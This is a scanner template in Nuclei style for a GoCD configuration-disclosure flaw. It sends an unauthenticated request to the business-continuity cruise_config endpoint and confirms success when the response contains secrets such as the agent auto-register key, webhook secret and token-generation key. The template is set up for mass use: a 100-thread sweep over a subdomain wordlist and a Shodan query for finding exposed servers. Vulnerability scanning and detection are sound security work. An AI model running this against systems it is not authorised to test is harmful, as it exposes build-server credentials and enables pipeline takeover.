id: gocd-cruise-configuration
info:
  name: GoCd Cruise Configuration disclosure
  author: dhiyaneshDk
  severity: high
  reference:
    - https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
    - https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
    - https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
  tags: go,gocd,config,exposure,misconfig
  metadata:
    shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100
    raw:
      - |
        GET /go/add-on/business-continuity/api/cruise_config HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "server agentAutoRegisterKey"
          - "webhookSecret"
          - "tokenGenerationKey"
        condition: and
